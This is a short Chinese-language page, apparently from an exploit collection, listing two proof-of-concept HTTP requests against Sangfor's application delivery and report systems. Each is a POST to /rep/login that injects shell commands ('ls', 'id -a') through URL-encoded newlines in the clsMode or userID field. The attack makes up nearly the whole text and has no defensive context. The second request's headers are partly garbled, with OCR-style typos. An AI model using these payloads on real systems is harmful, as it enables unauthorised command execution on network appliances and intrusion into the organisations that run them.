深信服

目录

• 应用交付
  • 深信服应用交付系统命令执行漏洞 POC
• 深信服报表
  • 深信服 sxf-报表系统 版本有限制

应用交付

深信服应用交付系统命令执行漏洞 POC

POST /rep/login

Host:10.10.10.1:85

clsMode=cls_mode_login%0Als%0A\&index=index\&log_type=report\&loginType=account\&page=login\&rnd=0\&userID=admin\&userPsw=123

深信服报表

深信服 sxf-报表系统 版本有限制

POC

POST /rep/login HTTP/1.1

Host: URL

Cookie:

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0

Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,*/*;q=0.8 Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2

Accept-Encoding: gzip deflate

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache14 Te: trailers

Connection: close

Content-Type:application/x-www-form-urlencoded

Content-Length: 126 clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq